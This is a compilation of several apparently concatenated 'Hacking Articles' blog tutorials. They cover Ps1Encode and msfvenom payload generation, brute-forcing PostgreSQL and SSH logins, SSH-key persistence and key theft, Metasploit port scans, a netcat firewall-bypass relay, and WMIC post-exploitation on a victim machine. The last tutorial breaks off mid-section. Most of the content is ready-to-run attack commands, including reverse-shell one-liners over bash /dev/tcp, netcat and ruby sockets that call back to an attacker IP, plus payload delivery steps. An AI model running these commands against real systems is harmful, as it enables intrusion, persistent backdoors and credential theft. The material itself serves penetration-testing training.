In this article, we will learn the Ps1Encode tool and how to use it by generating malware in different file formats such as HTA, EXE, etc.

Introduction

The working code of Ps1Encode is developed by Piotr Marszalik, Dev Kennedy with few others. Ps1Encode is used to generate a malicious payload in order to generate a meterpreter session. While generating the payload, it will encode it too. It is a different way to bypass Whitelisting and security on the target system. It’s developed in ruby and allows us to create a series of payloads which are based on Metasploit but can be prepared in any format we desire. The final aim is to get a PowerShell running and execute our payload through it.

There are various formats for our malware that are supported by Ps1Encode are the following :

• raw (encoded payload only – no powershell run options)
• cmd (for use with bat files)
• vba (for use with macro trojan docs)
• vbs (for use with vbs scripts)
• war (tomcat)
• exe (executable) requires MinGW – x86_64-w64-mingw32-gcc [apt-get install mingw-w64]
• java (for use with malicious java applets)
• js (javascript)
• js-rd32 (javascript called by rundll32.exe)
• php (for use with php pages)
• hta (HTML applications)
• cfm (for use with Adobe ColdFusion)
• aspx (for use with Microsoft ASP.NET)
• lnk (windows shortcut – requires a webserver to stage the payload)
• sct (COM scriptlet – requires a webserver to stage the payload)

You can download Ps1Encode from here using git clone command as shown in the image below :

Once it’s downloaded, let’s use the help command to check the syntax that we have to use. Use the following set of commands for that :

cd ps1encode/
ls
./ps1encode.rb -h

Following are the syntaxes that we can use :

-i : defines localhost IP

-p : defines localhost port value

-a : defines payload value

-t : defines the output format

Now, we will generate a malicious raw file using the following command :

./ps1encode.rb -I 192.168.1.107 -p 8000 -a windows/meterpreter/reverse_https

Copy the code generated using the above command in the file with the extension.bat. and then share it by using the python server. You can start the server using the following command :

python -m SimpleHTTPServer 80

Simultaneously, start the multi handler to have a session with the following set of commands :

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.107
lport 8000
exploit

Once the file is executed in the victims’ PC, you will have your session as shown in the image above. Now we will generate our malware in the form of HTA file. Use the following command to generate the HTA file :

./ps1encode.rb -i 192.168.1.107 -p 4444 -a windows/meterpreter/reverese_tcp -t hta

Following script will be created due to the above command, send this file to the victim’s PC using python server like before.

Simultaneously, start the multi handler to have a session with the following set of commands :

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.107
set lport 8000
exploit

Once the file is executed in the victims’ PC, you will have your session as shown in the image above. Now we will try and generate an EXE file with the following :

./ps1encode -i 192.168.1.107 -p 4444 -a windows/meterpreter/reverse_tcp -t exe

Send this file to the victim’s PC using python server like before a shown in the image above. Simultaneously, start the multi handler to have a session with the following set of commands :

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.107
set lport 8000
exploit

This way, you can use Ps1Encode to generate files in any format. As you can see, it’s pretty simple and convenient along with being user-friendly. Possibilities with Ps1Encode are endless.

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Generate Metasploit Payload with Ps1encode appeared first on Hacking Articles.

In this article, we will learn how to gain control over our victim’s PC through 5432 Port use for Postgres service. There are various ways to do it and let take time and learn all those because different circumstances call for a different measure.

Table of Contents

• Hydra
• X-Hydra
• Medusa
• Ncrack
• Patator
• Metasploit

Let’s starts!!

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, Postgres, http, https, smb, several databases, and much more

Now, we need to choose a word list. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.120 postgres

-L: denotes path for username list

-P:  denotes path for the password list

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the Postgres username as Postgres and password as postgres.

xHydra

This is the graphical version to apply dictionary attack via 5432 port to hack a system. For this method to work:

Open xHydra in your kali And select Single Target option and there give the IP of your victim PC. And select Postgres in the box against Protocol option and give the port number 5432 against the port option.

Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to the Start tab and click on the Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, POSTGRES, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

medusa -h 192.168.1.120 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres

Here

-U: denotes path for username list

-P:  denotes path for the password list

As you can observe that we had successfully grabbed the Postgres username as Postgres and password as postgres.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.120:5432

 Here

-U: denotes path for username list

-P:  denotes path for the password list

As you can observe that we had successfully grabbed the Postgres username as Postgres and password as postgres.

Patator

 Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. It is quite useful for making brute force attack on several ports such as POSTGRES, HTTP, SMB and etc.

patator pgsql_login host=192.168.1.120 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt

From given below image you can observe that the process of dictionary attack starts and thus, you will attain the username and password of your victim.

Metasploit

This module attempts to authenticate against a PostgreSQL instance using the username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.

Open Kali terminal type msfconsole Now type 

use auxiliary/scanner/postgres/postgres_login
msf exploit (scanner/postgres/postgres_login)>set rhosts 192.168.1.120
msf exploit (scanner/postgres/postgres_login)>set user_file /root/Desktop/user.txt
msf exploit (scanner/postgres/postgres_login)>set pass_file /root/Desktop/pass.txt
msf exploit (scanner/postgres/postgres_login)>set stop_on_success true
msf exploit (scanner/postgres/postgres_login)> exploit

 From given below image you can observe that we had successfully grabbed the POSTGRES username and password.

Author: Rahul Virmani is a Certified Ethical Hacker and the researcher in the field of network Penetration Testing (CYBERSECURITY).  Contact Here

The post 6 Ways to Hack PostgresSQL Login appeared first on Hacking Articles.

Hello friends!! Today you will learn how to spawn a TTY reverse shell through netcat by using single line payload which is also known as stagers exploit that comes in Metasploit.

Basically, there are two types of terminal TTYs and PTs. TTYs are Linux/Unix shell which is hardwired terminal on a serial connection connected to mouse or keyboard and PTs is sudo tty terminal, to get the copy of terminals on network connections via SSH or telnet.

Let’s start!!

Attacker: Kali Linux

Target: Ubuntu

Open the terminal in your Kali Linux and type msfconsole to load Metasploit framework, now search all one-liner payloads for UNIX system using search command as given below, it will dump all exploit that can be used to compromise any UNIX system.

search cmd/unix

From given below image you can observe that it has dumped all exploit that can be used to be compromised any UNIX system. In this tutorial, we are going to use some of the payloads to spawn a TTY shell.

Bash Shell

In order to compromise a bash shell, you can use reverse_bash  payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.103 lport=1111 R

 Here we had entered the following detail to generate one-liner raw payload.

-p: type of payload you are using i.e. cmd/unix/reverse_bash

lhost: listening IP address i.e. Kali Linux IP

lport: Listening port number i.e. 1111 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in the below image, the size of the generated payload is 67 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTy shell.

For example when the target will open

0<&121-;exec 121<>/dev/tcp/192.168.1.103/1111;sh <&121 >&121 2>&121>

malicious code in terminal, the attacker will get a reverse shell through netcat.

nc -lvp 1111

As you can observe the result from given below image where the attacker has successfully accomplish targets system TTY shell, now he can do whatever he wishes to do.

For example:

whoami: it tells you are the root user of the system you have compromised.

Netcat Shell

In order to compromise a netcat shell, you can use reverse_netcat payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.103 lport=2222 R

 Here we had entered the following detail to generate one-liner raw payload.

-p: type of payload you are using i.e. cmd/unix/reverse_netcat

lhost: listening IP address i.e. Kali Linux IP

lport: Listening port number i.e. 2222 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in the below image, the size of the generated payload is 104 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

when the target will open

mkfifo /tmp/admoszx; nc 192.168.1.103 2222 0</tmp/admsozx | /bin/sh >/tmp/admson 2>&1; rm /tmp/admoszx )

malicious code in terminal, the attacker will get a reverse shell through netcat.

nc -lvp 2222

As you can observe the result from given below image where the attacker has successfully accomplish targets system TTY shell.

Perl shell

In order to compromise a Perl shell, you can use reverse_perl payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.103 lport=3333 R

 Here we had entered the following detail to generate one-liner raw payload.

-p: type of payload you are using i.e. cmd/unix/reverse_perl

lhost: listening IP address i.e. Kali Linux IP

lport: Listening port number i.e. 3333 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in the below image, the size of the generated payload is 232 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Now again when the target will open malicious code in terminal, the attacker will get a reverse shell through netcat.

nc -lvp 3333

As you can observe the result from given below image where the attacker has successfully accomplish targets system TTY shell. Here we found target IP address: 192.168.1.1106 by executing the ifconfig command in his TTY shell.

Python Shell

In order to compromise a python shell, you can use reverse_Python payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.103 lport=4444 R

 Here we had entered the following detail to generate one-liner raw payload.

-p: type of payload you are using i.e. cmd/unix/reverse_python

lhost: listening IP address i.e. Kali Linux IP

lport: Listening port number i.e. 4444 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in the below image, the size of the generated payload is 533 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Again when the target will open the following malicious code in his terminal, the attacker will get the reverse shell through netcat.

nc -lvp 4444

As you can observe the result from given below image where the attacker has successfully accomplish targets system TTY shell, now he can do whatever he wishes to do.

For example:

ifconfig: it tells IP configuration of the system you have compromised.

Ruby Shell

In order to compromise a ruby shell, you can use reverse_ruby payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_ruby lhost=192.168.1.103 lport=5555 R

 Here we had entered the following detail to generate one-liner raw payload.

-p: type of payload you are using i.e. cmd/unix/reverse_ruby

lhost: listening IP address i.e. Kali Linux IP

lport: Listening port number i.e. 5555 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in the below image, the size of the generated payload is 131 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Again when the target will open 

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.103","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

malicious code in his terminal, the attacker will get a reverse shell through netcat.

nc -lvp 5555

As you can observe the result from given below image where the attacker has successfully accomplish targets system TTY shell, now he can do whatever he wishes to do.

For example:

ifconfig: it tells IP configuration of the system you have compromised.

Netcat Gaping (Traditional)

In order to compromise a command shell, you can use reverse_netcat_gaping payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_netcat_gaping lhost=192.168.1.103 lport=6666 R

 Here we had entered the following detail to generate one-liner raw payload.

-p: type of payload you are using i.e. cmd/unix/reverse_netcat_gaping

lhost: listening IP address i.e. Kali Linux IP

lport: Listening port number i.e. 6666 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in the below image, the size of the generated payload is 533 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

In order to access /bin/sh shell of the target system for compromising TTY shell firstly, we had access PTs terminal  of the target through SSH and then paste the malicious code

nc 192.168.1.103 6666 -e /bin/sh

nc -lvp 6666

From given below image you can observe that we had successfully access TTY shell of the target system.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Generating Reverse Shell using Msfvenom (One Liner Payload) appeared first on Hacking Articles.

Probing through every open port is practically the first step hackers take in order to prepare their attack. And in order to work, one is required to keep their port open but at the same time, they are threatened by the fear of hackers. Therefore, one must learn to secure their ports even if they are open. In this post, we will discuss penetration testing of SSH which is also known as Secure Shell.

Table of content

• Introduction to SSH
• SSH Installation
• SSH Port Scanning
• Methods to Connect SSH
  • Terminal Command (Linux)
  • Putty (Windows)
• Port Redirection
• Port Redirection Testing
• Establish SSH connection using RSA key
• Exploit SSH with Metasploit
  • SSH Key Persistence- Post Exploitation
  • Stealing the SSH key
  • SSH login using pubkey
• SSH Password cracking

Introduction to SSH

The SSH protocol also stated to as Secure Shell is a technique for secure and reliable remote login from one computer to another. It offers several options for strong authentication, as it protects the connections and communications\ security and integrity with strong encryption. It is a secure alternative to the non-protected login protocols (such as telnet, rlogin) and insecure file transfer methods (such as FTP).

SSH Installation

It very easy to install and configure ssh service, we can directly install ssh service by using the openssh-server package from ubuntu repo. To install any service you must have root privilege account and then follow the given below command.

apt install openssh-server

when you will execute above command it will extract the package the install the default configure on the host machine. you can check open port with the help of netstat command on the host machine.

SSH Port Scanning

If you don’t have direct access to the host machine, use nmap to remotely identify the port state that is considered to be the initial step of the penetration test. Here we’re going to use Kali Linux to perform a penetration testing.

So, to identify an open port on a remote network, we will use a version scan of the nmap that will not only identify an open port but will also perform a banner grabbing that shows the installed version of the service.

nmap -sV -p22 192.168.1.103

Methods to Connect SSH

Terminal Command (Linux)

Now execute the following command to access the ssh shell of the remote machine as an authorized user. Username: ignite

Password: 123

ssh ignite@192.168.1.103

Putty (Windows)

Step1: Install putty.exe and run it, then enter the HOST IP address <192.168.1.103> and port <22>, also choose to connect type as SSH.

Step2: To establish a connection between the client and the server, a putty session will be generated that requires a login credential.

Username: ignite

Password: 123

Port Redirection

By default, ssh listen on port 22 which means if the attacker identifies port 22 is open then he can try attacks on port 22 in order to connect with the host machine. Therefore, a system admin chooses Port redirection or Port mapping by changing its default port to others in order to receive the connection request from the authorized network.

Follow the below steps for port redirection:

Step1: Edit the sshd_config from inside the /etc/sshd using the editor

nano /etc/sshd/sshd_config

Step2: Change port 22 into 2222 and save the file.

Step3: Then restart ssh

Port Redirection Testing

Thus, when we have run the scan on port 22, it has shown port state CLOSE for ssh whereas port 2222 OPEN for ssh which can be seen the given image.

Establish SSH connection using RSA key

Strong passwords don’t seem to be decent to secure the server because a brute force attack can crack them. That’s why you need an additional security method to secure the SSH server.

SSH key pairs is another necessary feature to authenticate clients to the server. It consists of a long string of characters: a public and a private key. You can place the public key on the server and private key on the client machine and unlock the server by connecting the private key of the client machine. Once the keys match up, the system permits you to automatically establish an SSH session without the need to type in a password.

Ssh-keygen is a tool for creating new authentication key pairs for SSH. Such key pairs are used for automating logins, single sign-on, and for authenticating hosts.

Thus, we will follow the steps for generating a key pair for authenticated connection.

Step1: Run the given command to generate an ssh key pair (id_rsa and id_rsa.pub) on the host machine Ubuntu.

ssh-keygen

Step2: Same should be done on the client machine which is authorized to establish the connection with the host machine (ubuntu).

ssh-keygen

Step3: Once the ssh key pair (id_rsa and id_rsa.pub) get generated then rename the id_rsa.pub into authorized_keys as show in the given image.

cat id_rsa.pub > authorized_keys

Step4: Share the authorized_keys with the host machine by copying it into the .ssh directory.

Step5: Edit the sshd_config from inside the /etc/sshd using the editor

nano /etc/sshd/sshd_config

Step6: Enable the “passwordauthentication no” comment

As a result of only the authorized machine which rsa key can establish a connection with the host machine without using password.

Now if you need to connect to the ssh server using your password username, the server will drop your connection request because it will authenticate the request that has authorized key.

Step7: Copy the id_rsa key from Kali Linux to the windows machine, to established connection using authorized keys on the windows machine,

Step8: Install puttygen.exe

Step 9: Run puttygen.exe and load the id_rsa and “save as key” named as Key

Step10: Use putty.exe to connect with the host machine by entering hostname 192.168.1.103 and port 22.

Step11: Navigate to SSH >auth and browse the key private key that you have saved as mention in step 9.

This will establish an ssh connection between windows client and server without using a password.

Exploit SSH with Metasploit

SSH Key Persistence- Post Exploitation

Consider a situation, that by compromising the host machine you have obtained a meterpreter session and want to leave a permanent backdoor that will provide a reverse connection for next time.

This can be achieved with the help of the Metasploit module named “SSH Key Persistence-a post exploit” when port 22 is running on the host machine.

This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.

use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
msf post(sshkey_persistence) >exploit

As can be seen in the image given, it added authorized keys to /home / ignite/.ssh and stored a private key within /root/.msf4/loot

As we ensure this by connecting the host machine via port 22 using a private key generated above. Here I have renamed the private as “key” and gave permission 600.

chmod 600 key
ssh -i key ignite@192.168.1.103

Bravo!! It works without any congestion and in this way, we can use ssh key as persistence backdoor.

Stealing the SSH key

Consider a situation, that by compromising the host machine you have obtained a meterpreter session and port 22 is open for ssh and you want to steal SSH public key and authorized key. This can be done with the help Metasploit module named “Multi Gather OpenSSH PKI Credentials Collection -a post exploit” as discussed below.

This module will collect the contents of all users .ssh directories on the targeted machine. Additionally, known_hosts and authorized_keys and any other files are also downloaded. This module is largely based on firefox_creds.rb.

use post/multi/gather/ssh_creds
msf post(ssh_creds) >set session 1
msf post(ssh_creds) >exploit

From given below image you can see we have got all authorized keys store in /home/ignite/.ssh directory in our local machine at /root/.msf4/loot and now use those keys for login into an SSH server.

This can be done manually by downloading keys directly from inside /home/ignite/.ssh as shown in the below image.

As we ensure this by connecting the host machine via port 22 using private key downloaded above. Let’s change the permission for the rsa key and to do this follow the step given below.

chmod 600 key
ssh -i key ignite@192.168.1.103

It works without any congestion and in this way, we can use ssh key as persistence backdoor.

SSH login using pubkey

Considering you have id_rsa key of the host machine and want to obtain meterpreter session via Metasploit and this can be achieved with the help of the following module.

This module will test ssh logins on a range of machines using a defined private key file and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single private key or several private keys in a single directory.

use auxillary/scanner/ssh /ssh_login_pubkey
auxiliary (scanner/ssh /ssh_login_pubkey)>set rhosts 192.168.1.103
auxiliary (scanner/ssh /ssh_login_pubkey)>set username ignite
auxiliary (scanner/ssh /ssh_login_pubkey)>set key_path /root/.ssh/id_rsa
auxiliary (scanner/ssh /ssh_login_pubkey)>exploit

This will give a command session which can be further updated into the meterpreter session by executing the following command.

sessions -u 1

SSH Password cracking

We can test a brute force attack on ssh for guessing the password or to test threshold policy while performing penetration testing on SSH. It requires a dictionary for username list and password list, here we have username dictionary “user.txt” and password list named “pass.txt” to perform the brute force attack with the help of hydra

hydra -L user.txt -P pass.txt 192.168.1.103 ssh

As a result you can observe that the host machine has no defence against brute force attack, and we were able to obtain ssh credential.

To protect your service against brute force attack you can use fail2ban which is an IPS. Read more from here to setup fail2ban IPS in the network.

If you will observe the given below image, then it can see here that this time the connection request drops by host machine when we try to launch a brute force attack.

Conclusion: In this post, we try to discuss the possible way to secure SSH and perform penetration testing against such a scenario.

Author: Nisha Sharma is trained in Certified Ethical hacking and Bug Bounty Hunter. Connect with her here

The post SSH Penetration Testing (Port 22) appeared first on Hacking Articles.

Scanning port is a technique used by penetration tester for identifying the state of computer network services associated with the particular port number. For example, port 80 is available for HTTP service and port 22 is available for SSH service.  We suggest using Nmap for enumerating port state, for best practice click here and learn Nmap working in detail.

Moreover, Metasploit also serves port scanning for enumerating computer network services and make it easier as compare to Nmap.

Let’s start!!

Requirement

Attacker:  Kali Linux (192.168.1.103)

Target: Ubuntu (192.168.1.105)

Open the terminal and add given below iptables rules for incoming packet traffic in target’s network which will drop the tcp ACK packet on port 80 and SYN packet on port 22 respectively.

sudo iptables -I INPUT -p tcp --tcp-flags ALL ACK --dport 80 -j DROP
sudo iptables -I INPUT -p tcp --tcp-flags ALL SYN --dport 22 -j DROP

ACK Scan

Now open the terminal in your Kali Linux and type msfconsole to load Metasploit framework and execute given below auxiliary command to run the specific module.

This module will Map out firewall rulesets with a raw ACK scan. Any unfiltered ports found means a stateful firewall is not in place for them.

Now as specified in given below command this module will send ack packet on port 21, 22, 80,443 to enumerate state of the firewall for these ports. If it receives reset packet as a reply from destination port then it will display unfiltered state for that particular port and if does not receive reset packet from destination port then it will not show any comment for that particular port which means the port is protected by the firewall.

use auxiliary/scanner/portscan/ack
msf auxiliary(ack) > set rhosts 192.168.1.105
msf auxiliary(ack) > set ports 21,22,80,443
msf auxiliary(ack) >exploit

From given below image you can observe that it is showing TCP unfiltered for port 21,22,443 and did not comment for port 80 hence port 80 is filtered. This scan can be only used for identifying the state of the firewall in terms of port filter or unfiltered.

We had used Wireshark for demonstrating ack scan and here you can observe that port 80 doesn’t reply with RST packet which means ack packet for port 80 has been blocked by the network administrator.

SYN Scan

This module enumerates open TCP services using a raw SYN scan, the here syn packet will be sent on port 21, 22, 80,443 to enumerate state open/closed for these ports. If it receives syn, ack packet as a reply from destination port then it will display OPEN state for that particular port and if does not receives syn, ack packet from destination port then it will not show any comment for that particular port which indicates filtered or Closed state for that particular port.

use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > set rhosts 192.168.1.105
msf auxiliary(syn) > set ports 21,22,80,443
msf auxiliary(syn) >exploit

From given below image you can observe that it is showing TCP OPEN for port 21,80,443 and did not comment for port 22 hence port 22 is filtered or closed.

Again we had used Wireshark for demonstrating syn scan and here you can observe that port 22 doesn’t reply with SYN, ACK packets which mean SYN packet for port 22 has been blocked by the network administrator.

Moreover, you can observe the following packet communication between the source and destination port.

• Source port sends SYN packet to the destination port
• Source port receives SYN, ACK packet from the destination port
• Source port sends RST packet to the destination port

TCP Scan

Enumerate open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set rhosts 192.168.1.105
msf auxiliary(tcp) > set ports 21,22,80,443
msf auxiliary(tcp) >exploit

This scan is similar as SYN scan only the difference is that it follows TCP full communication i.e. 4-way handshake and SYN scan is followed half TCP communication.

From given below image you can observe that it is showing TCP OPEN for port 21,80,443 and did not comment for port 22 hence port 22 is filtered or closed.

Here you can observe that port 22 doesn’t reply with SYN, ACK packets which mean SYN packet for port 22 has been blocked by the network administrator.

Moreover, you can observe the following packet communication between the source and destination port.

• Source port sends SYN packet to the destination port
• Source port receives SYN, ACK packet from the destination port
• Source port sends ACK packet to the destination port
• Source port sends FIN, ACK packet to the destination port

XMAS Scan

Enumerate open|filtered TCP services using a raw “Xmas” scan; this sends probes containing the FIN, PSH, and URG flags.

Instead of using TCP 3-way handshake communication this scan uses other tcp flags for TCP communication for enumerating state of ports.

use auxiliary/scanner/portscan/xmas
msf auxiliary(xmas) > set rhosts 192.168.1.105
msf auxiliary(xmas) > set ports 21,22,80,443
msf auxiliary(xmas) >exploit

From given below image you can observe that, this time it has shown TCP OPEN| FILTERED for all ports i.e.  21,22,80,443

If you notice given below image here source port sends FIN, PUSH and URG packets to the destination and destination port didn’t send any reply to source port which indicates above specified port are open and if any destination port sends RST, ACK packet to source port then it indicated that particular port is closed.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Port Scanning using Metasploit with IPTables appeared first on Hacking Articles.

Today we are going to access the ssh port which is blocked by the firewall and is forwarded to another port through Port relay tool. Netcat relay is quite a useful tool to connect with any remote system by evading the firewall restriction.

Attacker: Kali Linux (IP: 192.168.1.2)

Victim: Ubuntu Server (IP: 192.168.1.7)

Connect to SSH via port 22

Lets first try to get the normal SSH shell.  As you can see in the given screenshot we successfully get the ssh shell on the port 22 of the Server 192.168.1.7.

ssh pavan@192.168.1.7

Block Port 22 for Incoming TCP Packet

Now let’s block SSH service Port 22 for Incoming TCP Packet using Iptables. Here we are making an inbound rule to block the TCP packets on the port 22 if the packet source is Kali (192.168.1.2)

iptables -A INPUT -s 192.168.1.2 -p tcp --dport 22 -j DROP

After Blocking the port let’s try to get a shell. From given below image you can observe that we got a Connection Time Out Error as the packets are dropped by the firewall.

Allow TCP Packets on another port

Now let’s make a rule in the firewall to accept the TCP packets on the port 4444 if the packet source is Kali (192.168.1.2).

iptables –I INPUT 1 –s 192.168.1.2 –p tcp --dport 4444 –j ACCEPT

Check Netcat communication between Attacker and Client

Let’s check if we can get a netcat session on the port 4444 to the Kali (192.168.1.2).

nc –v –l –p 4444

nc 192.168.1.7 4444

As you can see in the given Image that we have received a netcat session on the port 4444 from SSH server on the Kali (192.168.1.2).

Use Netcat Relay backpipe to access SSH service

Now we will have to make a Relay. But first, let’s understand, what the commands depicted below do?

The First command makes a special type of file called a FIFO or named pipe. We call it backpipe because it is going to carry our responses back through the relay.

Now the second command makes a netcat listener that is allowed through the firewall. This Netcat listener will connect its standard input (0<) to the backpipe. We then forward the standard output of this Netcat listener to Netcat client, which connects to our localhost (127.0.0.1) on TCP port 22 where sshd listens. We then use the forward pipe (1>) to send data and receive responses simultaneously. We need a back and forward pipe because Netcat provides two-way communication.

mknod /tmp/backpipe p

Here,

[p]: Tells the mknod to create a FIFO

nc –l –p 4444 0</tmp/backpipe | nc localhost 22 1>/tmp/backpipe

Here,

[-l]: Listener

[-p]: Port

Access SSH through Netcat Relay

Now let’s try to connect the ssh connection through the port 4444.

ssh pavan@192.168.1.7 –p 4444

Here,

[-p]: To specify Port

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Bypass SSH Restriction by Port Relay appeared first on Hacking Articles.

This article is about Post Exploitation using the WMIC (Windows Management Instrumentation Command Line). When an Attacker gains a meterpreter session on a Remote PC, then he/she can enumerate a huge amount of information and make effective changes using the WMI Command Line.

To do this, we will first get the meterpreter session on the Remote PC which you can learn from here. After gaining the session, escalate its privilege to Administrator which you can learn from here.

WMIC command line can be accessed through the windows cmd. To access that type “shell” in the meterpreter shell.

Now let’s look at the wmic commands and their working

WMIC

This command shows the global options which are used in the wmic command. WMIC Global Options are used to set properties of the WMIC environment. With the combination of global options and the aliases than we can manage the system through the wmic environment.

wmic /?

Get System Roles, User Name, and Manufacturer

We can enumerate lots of information about the Victim System including its Name, Domain, Manufacturer, Model Number and Much more through the computer system alias of wmic command.

We are adding the following filters to get a specific result.

Roles: It gives all the roles that the victim system play like Workstation, Server, Browser etc.

Manufacturer: It gives the manufacturer of the system, sometimes there are certain vulnerabilities in a particular model of a particular model. So we can use this information to search for any direct vulnerabilities.

UserName: It gives the username of the system which is proven very helpful as we can differentiate between administrators and normal users

[/format: list]: To sort the output in a list format.

wmic computersystem get Name, domain, Manufacturer, Model, Username, Roles /format:list

Get the SIDs

To enumerate these SIDs we will use group alias of wmic.

wmic group get Caption, InstallDate, LocalAccount, Domain, SID, Status

As shown in the below image here we have found the Account Name, Domain, Local Group Member status, SID and their status.

Create a process

We can create many processes on the victim’s system using the process alias of wmic command.

This is helpful in running any backdoor or fill up the memory of the victim’s system.

Syntax: wmic process call create “[Process Name]”

wmic process call create "taskmgr.exe"

As you can see in the below screenshot that this command not only create a process but also gives the “process id” so that we can manipulate that process according to our need.

Note: if the process creates a window like Task Manager, cmd, etc. then this command will open up that window on the victim’s system and create suspicion in the mind of the victim.

Change Priority of a Process

We can change the priority of any process running on the victim’s system with the help of process alias of wmic command.

This is an important feature because it can be used to manipulate processes as we can increase the priority of any process of our choice or decrease the priority of any process. Decreasing the priority of any process can result in the crashing of that particular application and increasing may crash the overall system.

wmic process where name="explorer.exe" call setpriority 64

Terminate a process

We can terminate a process running on the victim’s system with the help of process alias of wmic command.

wmic process where name="explorer.exe" call terminate

Get a list of Executable Files

We can get a list which contains the location of the executable files other than that of windows.

wmic PROCESS WHERE "NOT ExecutablePath LIKE ‘%Windows%’" GET ExecutablePath

Get Folder Properties

To extract the basic information about a folder on the victim’s system we can use fsdir alias of the wmic command line.

It can enumerate the following information about a folder:

Compressed, CompressionMethod, Creation Date, File Size, Readable, Writable, System File or not, Encrypted, Encryption Type and much more.

wmic FSDIR where "drive='c:' and filename='test" get /format:list

Get File Properties

To extract the basic information about a file on the victim’s system we can use datafile alias of the wmic command line.

It can enumerate following information about a file:

Compressed, CompressionMethod, Creation Date, File Size, Readable, Writable, System File or not, Encrypted, Encryption Type and much more.

Syntax: wmic datafile where=’[Path of File]’ get /format:list

wmic datafile where name='c:\\windows\\system32\\demo\\demo.txt' get /format:list

Locate System Files

Extract paths of all the important system files like temp folder, win directory and much more.

wmic environment get Description, VariableValue

From given below image you can read variable value with their given description.

Get a list of Installed Applications

We can get a list of applications or software installed on the victim’s system

wmic product get name

Get a list of Running Services

We can fetch the list of services which are running and services which start automatically or not.

wmic service where (state="running") get caption, name, startmode, state

From given below image you can observe startmode either as “Auto” or as “Manual” and state “Running” for given services.

Get Startup Services

We can enumerate startup services using startup alias for all the services that run during the windows startup.

wmic startup get Caption, Command

Get System Driver Details

We can enumerate Driver Details like Name, Path and Service Type using the sysdrive alias.

This command gives the path of the driver file, its status (Running or Stopped), Its Type (Kernel or File System)

wmic sysdriver get Caption, Name, PathName, ServiceType, State, Status /format:list

Get OS Details

We can enumerate the location of the victim by using the time zone in which the system is set, this can be extracted using the OS alias.

We also get the Last Boot Update Time and The Number of Registered Users and Number of Processors and information about Physical & Virtual Memory, all using os alias.

wmic os get CurrentTimeZone, FreePhysicalMemory, FreeVirtualMemory, LastBootUpdate, NumberofProcesses, NumberofUsers, Organization, Registereduser, Status /format:list

Get the Motherboard Details

We can use the baseboard alias of the wmic command line to enumerate the motherboard details of the victim’s system. Things we can enumerate are Motherboard Manufacturer, Serial Number, and Version

wmic baseboard get Manufacturer, Product, SerialNumber, Version

Get BIOS Serial Number

We can use the bios alias of the wmic command line to enumerate the bios details of the victim’s system.

wmic bios, get serialNumber

From given below image you can check bios serial number that we have enumerated of victim’s system.

Get Hard Disk Details

We can enumerate information about the System Hard Disk using the diskdrive alias.

We get to know the Interface Type, Manufacturer, and Model Name, all through this command.

wmic diskdrive get Name, Manufacturer, Model, InterfaceType, MediaLoaded, MediaType /format:list

Get Hard Disk Partitions Details

